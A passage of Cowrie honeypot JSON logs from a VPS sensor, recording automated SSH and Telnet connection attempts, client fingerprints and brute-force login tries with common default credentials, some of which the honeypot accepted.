03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:35:47.669372Z","src_ip":"185.152.45.241","session":"961d11c44c9b"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:47.692325Z","src_ip":"212.227.235.229","session":"1b59d45b4fa0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57271,"dst_ip":"1.2.3.4","dst_port":22,"session":"20fbfe523bb9","protocol":"ssh","message":"New connection: 212.227.235.229:57271 (1.2.3.4:22) [session: 20fbfe523bb9]","sensor":"my-vps","timestamp":"2025-09-09T02:35:47.941073Z"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:35:47.943949Z","src_ip":"185.152.45.241","session":"961d11c44c9b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:35:47.944757Z","src_ip":"212.227.235.229","session":"20fbfe523bb9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:35:48.198768Z","src_ip":"212.227.235.229","session":"20fbfe523bb9"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:48.999004Z","src_ip":"185.152.45.241","session":"961d11c44c9b"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11768,"dst_ip":"1.2.3.4","dst_port":22,"session":"6efff000c1c1","protocol":"ssh","message":"New connection: 185.152.45.241:11768 (1.2.3.4:22) [session: 6efff000c1c1]","sensor":"my-vps","timestamp":"2025-09-09T02:35:49.048718Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:35:49.049554Z","src_ip":"185.152.45.241","session":"6efff000c1c1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:35:49.098459Z","src_ip":"185.152.45.241","session":"6efff000c1c1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:35:49.219700Z","src_ip":"212.227.235.229","session":"20fbfe523bb9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:35:49.359081Z","src_ip":"185.152.45.241","session":"6efff000c1c1"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:49.408921Z","src_ip":"185.152.45.241","session":"11596ad235fe"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:49.409823Z","src_ip":"185.152.45.241","session":"6efff000c1c1"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:49.479234Z","src_ip":"212.227.235.229","session":"20fbfe523bb9"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:49.482476Z","src_ip":"212.227.235.229","session":"53f0f1a0f572"}
{"eventid":"cowrie.session.closed","duration":12.805628538131714,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:49.829504Z","src_ip":"212.227.235.229","session":"75ddda3b4a2e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33308,"dst_ip":"1.2.3.4","dst_port":23,"session":"49f69b6167ab","protocol":"telnet","message":"New connection: 212.227.235.229:33308 (1.2.3.4:23) [session: 49f69b6167ab]","sensor":"my-vps","timestamp":"2025-09-09T02:35:50.108418Z"}
{"eventid":"cowrie.session.closed","duration":13.658087968826294,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:53.052832Z","src_ip":"212.227.235.229","session":"67d6d017bee4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33453,"dst_ip":"1.2.3.4","dst_port":23,"session":"bce42f406e20","protocol":"telnet","message":"New connection: 212.227.235.229:33453 (1.2.3.4:23) [session: bce42f406e20]","sensor":"my-vps","timestamp":"2025-09-09T02:35:53.295268Z"}
{"eventid":"cowrie.session.closed","duration":41.18626308441162,"message":"Connection lost after 41 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:53.918075Z","src_ip":"212.227.125.160","session":"7f95947bf066"}
{"eventid":"cowrie.session.closed","duration":14.013108730316162,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:54.041971Z","src_ip":"212.227.235.229","session":"98d80d554a4d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33455,"dst_ip":"1.2.3.4","dst_port":23,"session":"d0b01ca5c3e1","protocol":"telnet","message":"New connection: 212.227.235.229:33455 (1.2.3.4:23) [session: d0b01ca5c3e1]","sensor":"my-vps","timestamp":"2025-09-09T02:35:54.310019Z"}
{"eventid":"cowrie.session.closed","duration":13.012479543685913,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:54.995885Z","src_ip":"212.227.235.229","session":"da5eac7efa20"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33460,"dst_ip":"1.2.3.4","dst_port":23,"session":"4988162c276e","protocol":"telnet","message":"New connection: 212.227.235.229:33460 (1.2.3.4:23) [session: 4988162c276e]","sensor":"my-vps","timestamp":"2025-09-09T02:35:55.257681Z"}
{"eventid":"cowrie.session.closed","duration":13.915937662124634,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:56.146157Z","src_ip":"212.227.235.229","session":"55a84caed96a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33466,"dst_ip":"1.2.3.4","dst_port":23,"session":"dd1eb2713ba2","protocol":"telnet","message":"New connection: 212.227.235.229:33466 (1.2.3.4:23) [session: dd1eb2713ba2]","sensor":"my-vps","timestamp":"2025-09-09T02:35:56.442837Z"}
{"eventid":"cowrie.session.closed","duration":13.510370016098022,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:58.755091Z","src_ip":"212.227.235.229","session":"bb74d7a7d431"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33485,"dst_ip":"1.2.3.4","dst_port":23,"session":"079cf084312b","protocol":"telnet","message":"New connection: 212.227.235.229:33485 (1.2.3.4:23) [session: 079cf084312b]","sensor":"my-vps","timestamp":"2025-09-09T02:35:59.019958Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60678,"dst_ip":"1.2.3.4","dst_port":22,"session":"8bc8cc405897","protocol":"ssh","message":"New connection: 212.227.235.229:60678 (1.2.3.4:22) [session: 8bc8cc405897]","sensor":"my-vps","timestamp":"2025-09-09T02:36:02.110212Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:36:02.111975Z","src_ip":"212.227.235.229","session":"8bc8cc405897"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:36:02.363711Z","src_ip":"212.227.235.229","session":"8bc8cc405897"}
{"eventid":"cowrie.login.failed","username":"hacker","password":"pass","message":"login attempt [hacker/pass] failed","sensor":"my-vps","timestamp":"2025-09-09T02:36:03.375234Z","src_ip":"212.227.235.229","session":"8bc8cc405897"}
{"eventid":"cowrie.session.closed","duration":13.665977954864502,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:36:03.774297Z","src_ip":"212.227.235.229","session":"49f69b6167ab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33641,"dst_ip":"1.2.3.4","dst_port":23,"session":"d34bac1b5be1","protocol":"telnet","message":"New connection: 212.227.235.229:33641 (1.2.3.4:23) [session: d34bac1b5be1]","sensor":"my-vps","timestamp":"2025-09-09T02:36:04.065177Z"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:36:04.632143Z","src_ip":"212.227.235.229","session":"8bc8cc405897"}
{"eventid":"cowrie.session.closed","duration":13.500608444213867,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:36:06.795808Z","src_ip":"212.227.235.229","session":"bce42f406e20"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33660,"dst_ip":"1.2.3.4","dst_port":23,"session":"3d92f021907a","protocol":"telnet","message":"New connection: 212.227.235.229:33660 (1.2.3.4:23) [session: 3d92f021907a]","sensor":"my-vps","timestamp":"2025-09-09T02:36:07.075387Z"}
{"eventid":"cowrie.session.closed","duration":13.5134437084198,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:36:07.823348Z","src_ip":"212.227.235.229","session":"d0b01ca5c3e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33670,"dst_ip":"1.2.3.4","dst_port":23,"session":"9d450f43b7fc","protocol":"telnet","message":"New connection: 212.227.235.229:33670 (1.2.3.4:23) [session: 9d450f43b7fc]","sensor":"my-vps","timestamp":"2025-09-09T02:36:08.134283Z"}
{"eventid":"cowrie.session.closed","duration":13.4660005569458,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:36:08.723607Z","src_ip":"212.227.235.229","session":"4988162c276e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33675,"dst_ip":"1.2.3.4","dst_port":23,"session":"51802d256b42","protocol":"telnet","message":"New connection: 212.227.235.229:33675 (1.2.3.4:23) [session: 51802d256b42]","sensor":"my-vps","timestamp":"2025-09-09T02:36:09.015578Z"}
{"eventid":"cowrie.session.closed","duration":13.589990615844727,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:36:10.032763Z","src_ip":"212.227.235.229","session":"dd1eb2713ba2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33681,"dst_ip":"1.2.3.4","dst_port":23,"session":"a5a5106c47ab","protocol":"telnet","message":"New connection: 212.227.235.229:33681 (1.2.3.4:23) [session: a5a5106c47ab]","sensor":"my-vps","timestamp":"2025-09-09T02:36:10.328902Z"}
{"eventid":"cowrie.session.closed","duration":13.752649068832397,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:36:12.772496Z","src_ip":"212.227.235.229","session":"079cf084312b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33823,"dst_ip":"1.2.3.4","dst_port":23,"session":"1170cea0e2f9","protocol":"telnet","message":"New connection: 212.227.235.229:33823 (1.2.3.4:23) [session: 1170cea0e2f9]","sensor":"my-vps","timestamp":"2025-09-09T02:36:13.068785Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50364,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a99bff6676f","protocol":"ssh","message":"New connection: 212.227.235.229:50364 (1.2.3.4:22) [session: 5a99bff6676f]","sensor":"my-vps","timestamp":"2025-09-09T02:36:15.493161Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:36:15.496085Z","src_ip":"212.227.235.229","session":"5a99bff6676f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:36:15.872604Z","src_ip":"212.227.235.229","session":"5a99bff6676f"}
{"eventid":"cowrie.session.closed","duration":13.163546323776245,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:36:17.228658Z","src_ip":"212.227.235.229","session":"d34bac1b5be1"}
{"eventid":"cowrie.login.failed","username":"dev","password":"qwerty","message":"login attempt [dev/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T02:36:17.375304Z","src_ip":"212.227.235.229","session":"5a99bff6676f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33853,"dst_ip":"1.2.3.4","dst_port":23,"session":"a5b26e58991d","protocol":"telnet","message":"New connection: 212.227.235.229:33853 (1.2.3.4:23) [session: a5b26e58991d]","sensor":"my-vps","timestamp":"2025-09-09T02:36:17.459548Z"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:36:18.757925Z","src_ip":"212.227.235.229","session":"5a99bff6676f"}
{"eventid":"cowrie.session.closed","duration":13.720476150512695,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:36:20.794970Z","src_ip":"212.227.235.229","session":"3d92f021907a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33873,"dst_ip":"1.2.3.4","dst_port":23,"session":"8e8be20b4663","protocol":"telnet","message":"New connection: 212.227.235.229:33873 (1.2.3.4:23) [session: 8e8be20b4663]","sensor":"my-vps","timestamp":"2025-09-09T02:36:21.098598Z"}
{"eventid":"cowrie.session.closed","duration":13.794855833053589,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:36:21.929047Z","src_ip":"212.227.235.229","session":"9d450f43b7fc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33975,"dst_ip":"1.2.3.4","dst_port":23,"session":"8c6cca553c00","protocol":"telnet","message":"New connection: 212.227.235.229:33975 (1.2.3.4:23) [session: 8c6cca553c00]","sensor":"my-vps","timestamp":"2025-09-09T02:36:22.195837Z"}
{"eventid":"cowrie.session.closed","duration":13.82345199584961,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:36:22.838962Z","src_ip":"212.227.235.229","session":"51802d256b42"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34004,"dst_ip":"1.2.3.4","dst_port":23,"session":"d91ff3bf1505","protocol":"telnet","message":"New connection: 212.227.235.229:34004 (1.2.3.4:23) [session: d91ff3bf1505]","sensor":"my-vps","timestamp":"2025-09-09T02:36:23.114002Z"}
{"eventid":"cowrie.session.closed","duration":13.722047090530396,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:36:24.050867Z","src_ip":"212.227.235.229","session":"a5a5106c47ab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34011,"dst_ip":"1.2.3.4","dst_port":23,"session":"b197f87c33cb","protocol":"telnet","message":"New connection: 212.227.235.229:34011 (1.2.3.4:23) [session: b197f87c33cb]","sensor":"my-vps","timestamp":"2025-09-09T02:36:24.274095Z"}
{"eventid":"cowrie.session.closed","duration":13.983468294143677,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:36:27.052177Z","src_ip":"212.227.235.229","session":"1170cea0e2f9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34040,"dst_ip":"1.2.3.4","dst_port":23,"session":"ca6786c1aaa3","protocol":"telnet","message":"New connection: 212.227.235.229:34040 (1.2.3.4:23) [session: ca6786c1aaa3]","sensor":"my-vps","timestamp":"2025-09-09T02:36:27.266024Z"}
{"eventid":"cowrie.session.closed","duration":13.338205575942993,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:36:30.797688Z","src_ip":"212.227.235.229","session":"a5b26e58991d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34067,"dst_ip":"1.2.3.4","dst_port":23,"session":"b548c7d426c3","protocol":"telnet","message":"New connection: 212.227.235.229:34067 (1.2.3.4:23) [session: b548c7d426c3]","sensor":"my-vps","timestamp":"2025-09-09T02:36:31.027094Z"}
{"eventid":"cowrie.session.closed","duration":13.913642883300781,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:36:35.012172Z","src_ip":"212.227.235.229","session":"8e8be20b4663"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34203,"dst_ip":"1.2.3.4","dst_port":23,"session":"648e2c4e805e","protocol":"telnet","message":"New connection: 212.227.235.229:34203 (1.2.3.4:23) [session: 648e2c4e805e]","sensor":"my-vps","timestamp":"2025-09-09T02:36:35.238573Z"}
{"eventid":"cowrie.session.closed","duration":13.742536783218384,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:36:35.938301Z","src_ip":"212.227.235.229","session":"8c6cca553c00"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34207,"dst_ip":"1.2.3.4","dst_port":23,"session":"3176282ac53e","protocol":"telnet","message":"New connection: 212.227.235.229:34207 (1.2.3.4:23) [session: 3176282ac53e]","sensor":"my-vps","timestamp":"2025-09-09T02:36:36.181220Z"}
{"eventid":"cowrie.session.closed","duration":13.684977054595947,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:36:36.798909Z","src_ip":"212.227.235.229","session":"d91ff3bf1505"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34212,"dst_ip":"1.2.3.4","dst_port":23,"session":"1aa5af4af274","protocol":"telnet","message":"New connection: 212.227.235.229:34212 (1.2.3.4:23) [session: 1aa5af4af274]","sensor":"my-vps","timestamp":"2025-09-09T02:36:37.038372Z"}
{"eventid":"cowrie.session.closed","duration":13.693012952804565,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:36:37.967030Z","src_ip":"212.227.235.229","session":"b197f87c33cb"}
{"eventid":"cowrie.session.connect","src_ip":"64.62.156.212","src_port":36882,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8758cd74776","protocol":"ssh","message":"New connection: 64.62.156.212:36882 (1.2.3.4:22) [session: e8758cd74776]","sensor":"my-vps","timestamp":"2025-09-09T02:36:38.195858Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-09-09T02:36:38.196977Z","src_ip":"64.62.156.212","session":"e8758cd74776"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:36:38.197839Z","src_ip":"64.62.156.212","session":"e8758cd74776"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34221,"dst_ip":"1.2.3.4","dst_port":23,"session":"238d9a8bc2ac","protocol":"telnet","message":"New connection: 212.227.235.229:34221 (1.2.3.4:23) [session: 238d9a8bc2ac]","sensor":"my-vps","timestamp":"2025-09-09T02:36:38.200202Z"}
{"eventid":"cowrie.session.closed","duration":13.509283781051636,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:36:40.775239Z","src_ip":"212.227.235.229","session":"ca6786c1aaa3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34242,"dst_ip":"1.2.3.4","dst_port":23,"session":"06c9977a3561","protocol":"telnet","message":"New connection: 212.227.235.229:34242 (1.2.3.4:23) [session: 06c9977a3561]","sensor":"my-vps","timestamp":"2025-09-09T02:36:41.025398Z"}
{"eventid":"cowrie.session.closed","duration":13.936486005783081,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:36:44.963512Z","src_ip":"212.227.235.229","session":"b548c7d426c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34384,"dst_ip":"1.2.3.4","dst_port":23,"session":"894b4c926dd2","protocol":"telnet","message":"New connection: 212.227.235.229:34384 (1.2.3.4:23) [session: 894b4c926dd2]","sensor":"my-vps","timestamp":"2025-09-09T02:36:45.199771Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40581,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2ac386a7f00","protocol":"ssh","message":"New connection: 212.227.235.229:40581 (1.2.3.4:22) [session: d2ac386a7f00]","sensor":"my-vps","timestamp":"2025-09-09T02:36:49.082166Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:36:49.086870Z","src_ip":"212.227.235.229","session":"d2ac386a7f00"}
{"eventid":"cowrie.session.closed","duration":14.032257556915283,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:36:49.270752Z","src_ip":"212.227.235.229","session":"648e2c4e805e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:36:49.333298Z","src_ip":"212.227.235.229","session":"d2ac386a7f00"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34411,"dst_ip":"1.2.3.4","dst_port":23,"session":"e8547273b02a","protocol":"telnet","message":"New connection: 212.227.235.229:34411 (1.2.3.4:23) [session: e8547273b02a]","sensor":"my-vps","timestamp":"2025-09-09T02:36:49.549057Z"}
